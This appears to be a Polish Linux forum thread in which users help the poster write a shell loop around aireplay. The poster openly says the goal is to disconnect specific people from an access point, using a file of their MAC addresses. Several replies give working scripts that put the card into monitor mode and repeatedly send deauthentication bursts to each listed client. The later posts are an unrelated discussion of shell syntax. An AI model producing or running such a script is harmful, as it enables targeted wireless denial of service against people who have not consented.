jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Problemy dotyczące programowania.

Moderatorzy: Moderatorzy, Administratorzy

Awatar użytkownika
qpalzm
Użytkownik
Posty: 172
Rejestracja: 2006-12-10, 18:07
Lokalizacja: Zabrze
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: qpalzm » 2007-03-01, 11:39

program dziala 30s
dziala tak dlugo az go nie wylaczysz.
Ciagle nie wiadomo co ma robic ten skrypt;)
www.xfce.daxa.pl

_Sheriff_
Użytkownik
Posty: 11
Rejestracja: 2007-03-01, 02:26
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: _Sheriff_ » 2007-03-01, 11:56

To moze mi ktoś pwoiedzieś jaką komenda wyłancza sie program?

I pytanko, jak wyglada problem uruchamiania kilka kopii tego samego programu w linuxie na raz. Czy stabilność zależy od tego jaki program uruchomilismy kilka razy czy od tego ile takich samych programów dziala na raz?

Kod: Zaznacz cały

#! /bin/sh

ifconfig ath0 up
airmon.sh start ath0 

petla() {
while :; do
    while read x; do :; done <file
    aireplay -0 0 -a 23:34:43:12:34 -c $x ath0
    sleep 30
done
petla
}
petla

Awatar użytkownika
qpalzm
Użytkownik
Posty: 172
Rejestracja: 2006-12-10, 18:07
Lokalizacja: Zabrze
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: qpalzm » 2007-03-01, 13:38

To moze mi ktoś pwoiedzieś jaką komenda wyłancza sie program?

Kod: Zaznacz cały

killall nazwa_procesu
zabija wszystkie procesy o nazwie nazwa_procesu !
to zdecydowanie dalo sie wygooglowac!

_Sheriff_
Użytkownik
Posty: 11
Rejestracja: 2007-03-01, 02:26
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: _Sheriff_ » 2007-03-01, 15:35

Czyli bedzie to wyglądać tak:

Kod: Zaznacz cały

Kod:
#!/bin/bash

ifconfig ath0 up
airmon.sh start ath0

while( true ); do
  for linia_pliku in `cat plik`; do
    aireplay -0 0 -a 23:34:43:12:34 -c $linia_pliku ath0;
    sleep 30;
     killall aireplay;
    sleep 5;
  done;
done;
[hide]Skrypt ma służyć do zagłuszenie pewnych ludzi łączących sie z AP, lista ich MAC adresów jest w pliku txt. Włączenie programu aireplay z takimi parametrami powoduje rozłączenie danej osoby na czas do puki jest włączony program. I dlatego chce włączyc go na określony czas.

Zastanawiam sie jak może to wpłynąć na karte WiFi, to takie co np 5s zmiana nadawania i przerwy, Jak myślici moze uszkodzic karte lub bedzie miala mniejsza wydajnosc?[/hide]

Awatar użytkownika
mina86
Moderator
Posty: 3314
Rejestracja: 2004-06-14, 21:58
Lokalizacja: Linux 4.x x86_64
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: mina86 » 2007-03-01, 21:30

czyli to bedzie tak?
Nie. Polecenie uruchamiasz wewnątrz tej drugiej pętli, tj.:

Kod: Zaznacz cały

#! /bin/sh 
while :; do 
    while read x; do
        aireplay -0 0 -a 23:34:43:12:34 -c "$x" ath0 
    done <file 
    sleep 30 
done
dawidmo pisze:Skorzystać z rekurencji
Gratuluję pomysłu. Rekurencja bez warunku końcowego.
Zastrzegam sobie prawo nieanalizowania postów pisanych niepoprawną polszczyzną. :: Post generated automatically by A.I. system called “mina86” in response to the previous one. :: Tiny Applications

_Sheriff_
Użytkownik
Posty: 11
Rejestracja: 2007-03-01, 02:26
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: _Sheriff_ » 2007-03-02, 11:29

To w końcu kto ma racje? Jak bedzie wygladal ten skrypt.
Tak ma to przebiegac:

1. wlaczenie skryptu ./skrypt
2. Uruchomienie karty ath0, ifconfig ath0 up
3. Wlaczenie karty w tryb monitorowania, airmon.sh start ath0
4. Zliczenie linijek w pliku.txt i podstawienie do zmiennej y

5. PETLA
{
6. Przypisanie do zminnej x kolejnych linijek z pliku.txt (1,2,3..... y)
7. Wywołanie programu z zmienną x, aireplay -0 0 -a 23:34:43:12:34 -c $x ath0
8. Program działa przez 30s, sleep 30
9. Zamknięcie programu killall aireplay
10. Przerwa pomiedzy pętlami 5s, sleep 5
}
11. Koniec_PETLI

Awatar użytkownika
mina86
Moderator
Posty: 3314
Rejestracja: 2004-06-14, 21:58
Lokalizacja: Linux 4.x x86_64
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: mina86 » 2007-03-02, 15:43

Po co krok 4?

Kod: Zaznacz cały

#! /bin/sh

ifconfig ath0 up 
airmon.sh start ath0

while read x; do
    aireplay -0 0 -a 23:34:43:12:34 -c "$x" ath0
    sleep 30
    killall aireplay
    sleep 5
done <plik.txt
Jednak Twój opis jest niejasny, więc równie dobrze to może być nie to co oczekujesz.
Zastrzegam sobie prawo nieanalizowania postów pisanych niepoprawną polszczyzną. :: Post generated automatically by A.I. system called “mina86” in response to the previous one. :: Tiny Applications

Awatar użytkownika
dawidmo
Użytkownik
Posty: 307
Rejestracja: 2006-08-24, 16:16
Lokalizacja: Pszczyna
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: dawidmo » 2007-03-02, 16:06

Twój skryp mna86, wykona sie tylko raz (raz odczyta plik)
_Sheriff_ pisze:Jest pętal która wykonuje sie tyle razy ile linijek w pliku, jak sie skonczą linijki ma zaczynać sie od poćzątku.
mina86 pisze:
dawidmo pisze:Skorzystać z rekurencji
Gratuluję pomysłu. Rekurencja bez warunku końcowego.
Dziekuje ;], równie dobrze można dodać nieskończoną pętle, zamiast wywoływać funkcje prze rekurencje, bez warunku zakończenia :-P.

PS: Czy wtedy nie będzie to już rekurencja, jak warunek nigdy nie zostanie spełniony a funkcja wywołuje samą siebie :?:
Aby chciało mi się tak bardzo, jak mi się nie chce ;]

Awatar użytkownika
mina86
Moderator
Posty: 3314
Rejestracja: 2004-06-14, 21:58
Lokalizacja: Linux 4.x x86_64
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: mina86 » 2007-03-02, 16:17

dawidmo pisze:Twój skryp mna86, wykona sie tylko raz (raz odczyta plik)
Nie twierdzę, że o to chodziło. Ale post z godziny 11:29 jest na tyle mało zrozumiały, że trudno mi było cokolwiek sensownego z niego wyciągnąć.
dawidmo pisze:równie dobrze można dodać nieskończoną pętle, zamiast wywoływać funkcje prze rekurencje, bez warunku zakończenia :-P.
Rekurencja bez warunku kończącego to teoretycznie to samo co pętla nieskończona, jednak w praktyce to pierwsze jest błędem, a to drugie poprawną konstrukcją.
dawidmo pisze:PS: Czy wtedy nie będzie to już rekurencja, jak warunek nigdy nie zostanie spełniony a funkcja wywołuje samą siebie :?:
Czy to będzie rekurencja czy nie to nie wnikam. Na pewno będzie to błąd.
Zastrzegam sobie prawo nieanalizowania postów pisanych niepoprawną polszczyzną. :: Post generated automatically by A.I. system called “mina86” in response to the previous one. :: Tiny Applications

_Sheriff_
Użytkownik
Posty: 11
Rejestracja: 2007-03-01, 02:26
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: _Sheriff_ » 2007-03-02, 21:45

Jak mam wam to jasniej napisac?

Skrypt ma wywolywac program ktory ma dzialac przez 30s i jednym z parametrów tego programu jest linijka z poliku.txt, potem program ma sie zakonczyc, nastepnie wystepuje preztwa 5s. I dalej uruchamiamy program tym razem parametrem jest kolejna linijka, dziala przez 30s, konczymy, przerwa 5s i zaczynamy znow nastepna linijke pliku.txt i tak do konca pliku. Skoncza sie linijki to zaczynamy od początku pliku i tak wkółko.

Czy jeszcze coś jest nie jasne? No bo wiedze zw sa podzielone zdania.

Awatar użytkownika
mina86
Moderator
Posty: 3314
Rejestracja: 2004-06-14, 21:58
Lokalizacja: Linux 4.x x86_64
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: mina86 » 2007-03-02, 22:20

No to trzeba było tak od razu napisać.

Kod: Zaznacz cały

#! /bin/sh 

ifconfig ath0 up 
airmon.sh start ath0 

while :; do
    while read x; do 
        aireplay -0 0 -a 23:34:43:12:34 -c "$x" ath0 
        sleep 30 
        killall aireplay 
        sleep 5 
    done <plik.txt
done
Zastrzegam sobie prawo nieanalizowania postów pisanych niepoprawną polszczyzną. :: Post generated automatically by A.I. system called “mina86” in response to the previous one. :: Tiny Applications

_Sheriff_
Użytkownik
Posty: 11
Rejestracja: 2007-03-01, 02:26
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: _Sheriff_ » 2007-03-06, 23:39

mam pytanie o program aireplay ale chcialbym zapytac na PV kogos kto sie na nim zna i sie bawi pakietem aircrack.

Czy jest ktos taki??

Awatar użytkownika
cherry
Moderator w st. spocz.
Posty: 1160
Rejestracja: 2004-06-15, 09:57
Lokalizacja: Kraków
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: cherry » 2007-08-06, 22:11

difrost pisze:
dawidmo pisze:Dokładnie difrost dlatego nie użyłem $(cat plik), bo nie działa. ;]
Ojj...dawidmo :) Notacja $(cat plik) jest dokładnie ekwiwalentem `cat plik` (a raczej na odwrót). Różnica jest tylko taka, że w '` `' nie można zagnieżdżać wywołać, a w $() można.
A to bardzo ciekawe, bo pod Solarisem 9.0 $(...) nie działa :shock:
Cльaцквaрэ Линукс цypэнт
[url]http://www.pajacyk.pl/[/url]
[url]http://www.polskieserce.pl/[/url]

bocian
Użytkownik
Posty: 678
Rejestracja: 2005-06-15, 10:15

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: bocian » 2007-08-06, 23:11

cherry pisze:pod Solarisem 9.0 $(...) nie działa
To skombinuj sobie jakąś POSIX-ową powłokę.

Awatar użytkownika
mina86
Moderator
Posty: 3314
Rejestracja: 2004-06-14, 21:58
Lokalizacja: Linux 4.x x86_64
Kontakt:

Re: jak napisac skrypt wczytajacy olejne linijki z txt w petli??

Post autor: mina86 » 2007-08-07, 00:12

difrost pisze:Ojj...dawidmo :) Notacja $(cat plik) jest dokładnie ekwiwalentem `cat plik` (a raczej na odwrót). Różnica jest tylko taka, że w '` `' nie można zagnieżdżać wywołać, a w $() można.
Oczywiście, że można.

Kod: Zaznacz cały

FOO=`cat \`cat bar\``
cherry pisze:A to bardzo ciekawe, bo pod Solarisem 9.0 $(...) nie działa :shock:
Bo Solaris to popierdułka jakaś i ze względów zgodności wstecz (tych gości z Sun Microsystems chyba zdrowo jeb..) /bin/sh to jest Bourne Shell (tak, ten staroć co go przy początkach Wszechświata napisano).
bocian pisze:To skombinuj sobie jakąś POSIX-ową powłokę.
Nie musi kombinować POSIX-owa powłoka w Solarisie jest gdzieś w jakimś /usr/xcośtam/bin albo w jakimś innym dziwnym miejscu.
Zastrzegam sobie prawo nieanalizowania postów pisanych niepoprawną polszczyzną. :: Post generated automatically by A.I. system called “mina86” in response to the previous one. :: Tiny Applications

ODPOWIEDZ